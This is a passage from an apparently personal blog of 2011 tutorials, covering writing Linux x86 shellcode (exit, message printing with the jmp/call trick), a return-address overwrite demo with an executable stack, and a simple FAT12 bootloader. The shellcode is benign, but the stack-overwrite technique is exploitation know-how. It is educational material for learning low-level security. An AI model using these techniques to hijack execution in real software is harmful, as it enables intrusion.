<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xc9</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ptr<span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> i<span style="color: #406080;">;</span>
<span style="color: #595979;">/* </span>
<span style="color: #595979;"> * overflow the return address</span>
<span style="color: #595979;"> * transfer the execution flow to shellcode</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">for</span><span style="color: #308080;">(</span>i<span style="color: #308080;">=</span><span style="color: #008c00;">0</span><span style="color: #406080;">;</span>i<span style="color: #308080;"><</span><span style="color: #008c00;">10</span><span style="color: #406080;">;</span>i<span style="color: #308080;">+</span><span style="color: #308080;">+</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
ptr <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ptr<span style="color: #308080;">+</span>i<span style="color: #406080;">;</span>
<span style="color: #308080;">*</span><span style="color: #308080;">(</span>ptr<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">Compile the source code and use execstack to enable the executable stack.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -g -o sleep4.out sleep4.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execstack -s sleep4.out</span><br />
execute the program and check the result is what we expected.<br />
Moreover, you can even use gdb to see the result.<br />
<div class="separator" style="clear: both; text-align: left;">Result:<span class="Apple-style-span"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--DzCCLfJvjc/Tg9Br3Z5riI/AAAAAAAAAFQ/AH98Ww9E4gU/s1600/gdb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/--DzCCLfJvjc/Tg9Br3Z5riI/AAAAAAAAAFQ/AH98Ww9E4gU/s400/gdb.jpg" width="330" /></a></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span">reference website:</span><a href="http://1.bp.blogspot.com/--DzCCLfJvjc/Tg9Br3Z5riI/AAAAAAAAAFQ/AH98Ww9E4gU/s1600/gdb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span class="Apple-style-span">http://www.governmentsecurity.org/forum/topic/19441-reduce-shellcode-by-4-bytes/ </span></a></div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-2355666947380700882011-06-30T02:56:00.000-07:002011-11-02T09:07:00.923-07:00Simple OS - bootloader part1The past few days, I've finished writing the bootloader. I summarize some of them and will post them on the blog.<br />
<br />
<b>Introduction:</b><br />
Before we started writing our code, there are some background knowlege.<br />
<b><br />
</b><br />
<b>Bootloader:</b><br />
what is a bootloader?<br />
A bootloader is a program that will load the kernel image into the memory, and jumps to it.<br />
<br />
how does it works?<br />
First when you press the power bottom, the bios will start first. And after the bios is loaded into the memory,<br />
it will first check which device you want to boot and check the first sector(The MBR) of the device. If it is OK, the bios will put the MBR code into the memory address 0x7c00 and jump to it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sud9r1AI3ng/Tgw8GRFxZfI/AAAAAAAAAEY/Rj-2srWrWkI/s1600/bootProcess.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="114" src="http://3.bp.blogspot.com/-sud9r1AI3ng/Tgw8GRFxZfI/AAAAAAAAAEY/Rj-2srWrWkI/s320/bootProcess.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>MBR:</b><br />
what is MBR?<br />
MBR is the abbreviation of master boot record. As the name suggest the code inside the MBR is the bootloader. In most cases, the MBR is in the first sector of your devices, such as the hard disk, floopy disk , compact disk and so on.<br />
<br />
The size of the MBR is 512 bytes. There are many fields contains in a MBR.<br />
a. code 440bytes<br />
b. Disk signature 4 bytes.<br />
c. null 2 bytes<br />
d. Partition tables. 64bytes<br />
e. MBR signature 2 bytes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XfOu3tS1O-I/Tgw9J2X1wNI/AAAAAAAAAEc/es0SCTcCpns/s1600/masterBootRecord.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="http://4.bp.blogspot.com/-XfOu3tS1O-I/Tgw9J2X1wNI/AAAAAAAAAEc/es0SCTcCpns/s320/masterBootRecord.jpg" width="320" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>BIOS interrupt:</b><br />
<b><br />
</b><br />
what is bios interrupt?<br />
bios interrupt is a low level interrupt which is loaded before the bootloader. BIOS interrupt contains many useful functions which can communicate with the I/O without fully understand the architecture.<br />
<br />
why using bios interrupt?<br />
as I previous mentioned, bootloader is to load the kernel image into the memory, and therefore there is no os system call or drivers to help you communicate with the I/O. The best way and the most convenient way is to use the bios interrupt to handle the I/O.<br />
<br />
<b>Coding time:</b><br />
After understand the information, it's time to write a simple hello world program in the boot loader.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Helloworld.S</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">.code1<span style="color: #008c00;">6</span>
.<span style="color: #004a43;">section</span> .text
.<span style="color: #004a43;">global</span> main
<span style="color: #e34adc;">main:</span>
<span style="color: red;">#FAT12 file system format
#there is nothing to change </span><span style="color: red; font-weight: bold;">in</span><span style="color: red;"> this part
</span><span style="color: red; font-weight: bold;">jmp</span><span style="color: red;"> start_prog
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0x90
.ascii "MicrMike"
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 512
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 1
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 1
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 2
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 224
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 2880
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0xf0
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 9
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 18
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 2
.long 0
.long 2880
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0x29
.long 0x19900303
.ascii "HELLO-OS "
.ascii "FAT12 "
.fill 18, 1, 0</span>
<span style="color: #e34adc;">start_prog:</span>
movw <span style="color: green;">$0</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ax</span>
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ss</span>
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ds</span>
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">es</span>
movw $msg<span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">si</span>
#using bios interrupt <span style="color: green;">10h</span>
#parameter of bios interrupt <span style="color: green;">10h</span>
<span style="color: #e34adc;">#%ah:</span> function number
<span style="color: #e34adc;">#%al:</span> the <span style="color: #200080; font-weight: bold;">offset</span> of the message
<span style="color: #e34adc;">loop:</span>
movb $<span style="color: green;">0xe</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ah</span>
movb <span style="color: #308080;">(</span><span style="color: #308080;">%</span><span style="color: navy;">si</span><span style="color: #308080;">)</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">al</span>
cmpb <span style="color: green;">$0</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">al</span>
<span style="color: #200080; font-weight: bold;">je</span> <span style="color: #e34adc;">fin</span>
<span style="color: #200080; font-weight: bold;">int</span> $<span style="color: green;">0x10</span>
addw <span style="color: green;">$1</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">si</span>
<span style="color: #200080; font-weight: bold;">jmp</span> <span style="color: #e34adc;">loop</span>
<span style="color: #e34adc;">fin:</span>
<span style="color: #200080; font-weight: bold;">jmp</span> <span style="color: #e34adc;">fin</span>
<span style="color: #e34adc;">msg:</span>
.ascii <span style="color: #1060b6;">"Hello world!!."</span>
.<span style="color: #200080; font-weight: bold;">byte</span> <span style="color: #008c00;">0</span>
.<span style="color: #004a43;">org</span> <span style="color: green;">0x1fe</span><span style="color: #308080;">,</span> <span style="color: green;">0x00</span>
.<span style="color: #200080; font-weight: bold;">word</span> <span style="color: green;">0xaa55</span></pre><div>P.S the above source code is using the at&t syntax. In this article I won't tell you how to write assembly, but you can google to find some great tutorial.</div><b>Comment:</b><br />
There are many things that is worth notice in the source code.<br />
1. The red highlight is the FAT12 file system format. Do not change this part.<br />
2. Since we are in the real mode and the ld will assume that the code is in 0x0, I need to initial the whole base register, such as ds, ss and so on.<br />
3. In order to print a message on the screen, I use the bios interrupt.<br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b>bios interrupt 10h</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b> %ah stores the function number, in this case use the $0xe.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b> %al stores the address of the message.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;">4. in the bottom of the code, don't forget to put the MBR signature, otherwise the bios will think the MBR is useless.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span><br />
<b>Compile:</b><br />
1. use gcc to compile the source code:<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -c Helloworld.S</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. use ld to link the obj file into the binary:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">ld -Ttext=0x0 --oformat binary Helloworld.o -o Helloworld.bin</span><br />
<span class="Apple-style-span" style="font-family: inherit;">3. use mkdosfs to create a virtual floppy disk</span><br />
<span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">mkdosfs -C os.flp 1440</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-family: inherit;">4. install the binary file into the virtual floppy disk by using dd</span></span><span class="Apple-style-span" style="font-family: inherit;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">dd status=noxfer conv=notrunc if=$boot_bin of=os.flp</span><br />
reference website:<br />
<br />
<b>Result:</b><br />
using qemu to test the result.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">qemu -fda os.flp</span><br />
<span class="Apple-style-span" style="font-family: inherit;">and you will see a hello world in the qemu.</span><br />
<a href="http://duartes.org/gustavo/blog/post/how-computers-boot-up">http://duartes.org/gustavo/blog/post/how-computers-boot-up</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-11557886549045952362011-06-29T12:15:00.000-07:002011-11-02T07:11:19.178-07:00Shell code 3(print message)After the exit_shell.out program is finished, it's time to move on.<br />
This time I will use a new system call which will print a message to the screen.<br />
<br />
<b>Background Knowlege:</b><br />
the way I use the system call is still the same, using the int $0x80.<br />
The parameters of print system call:<br />
eax = 4 => this is the system call number.<br />
ebx = 1 => we want to print the message to the stdout.<br />
ecx = msg => the address of the message.<br />
edx = len => the length of the message.<br />
<br />
OK, coding time.<br />
1.wrote the program into inline assembly.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> msg<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $msg,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">2.compile the source code with the following command:</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -g -o print.out print.c</span></div><div>3. execute the program<br />
<br />
</div><div>As u can see, the output message is in the global data, that's not good. I want the message is inside the shell code. Let's modified the source code a bit.</div><div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_1.c</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> <span style="color: red;">movl $msg,</span></span><span style="color: red;">%ecx;\</span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">However, in this way, how do I know the address of the message.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Thanks to this web site: <a href="http://insecure.org/stf/smashstack.html">http://insecure.org/stf/smashstack.html</a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">I found the solution. The following is the modified version of the code.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_2.c</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><b>Explanation:</b></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Use the <i><b>relative jmp/call </b></i>to accomplish this job.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">1. we first use the relative jump to jump to the call instruction.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">2. next we use the relative call instruction to transfer the execution flow to the label 1.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">So how does these steps has anything to do with the address of the message.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">This is a very tricky way.<i><b> When u call a function, the cpu will automatically push the eip into the stack.</b></i> And look what is behind the call function, it is the message. So the cpu will help us to push the address of the message to the stack.</span></div><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">And now let's compile the file, and test the output.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">It works.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">The next step is much easier than above, all I have to do is use the objdump to dump the file, and change the inline assembly into shell code.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_shell.c</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"></span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x20</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x04</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
